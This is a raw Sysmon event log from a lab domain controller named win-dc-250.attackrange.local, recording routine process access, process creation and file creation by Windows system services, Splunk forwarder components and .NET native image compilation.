13:21:18.631{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-454E-6000-7701-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-454E-6000-7701-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-454E-6000-7701-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.631{08A6967A-454E-6000-7701-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000005653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:18.302{08A6967A-453E-6000-7201-000000009A01}2360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\938-0\PresentationFramework.dll2021-01-14 13:21:18.302 10341000x80000000000000005652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.099{08A6967A-454D-6000-7601-000000009A01}35404692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.631{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-454F-6000-7C01-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.631{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-454F-6000-7C01-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.631{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-454F-6000-7C01-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.599{08A6967A-454F-6000-7A01-000000009A01}49004892C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.490{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-454F-6000-7B01-000000009A01}912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.474{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-454F-6000-7B01-000000009A01}912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.474{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-454F-6000-7B01-000000009A01}912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.443{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-454F-6000-7A01-000000009A01}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.443{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.443{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.443{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:19.443{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 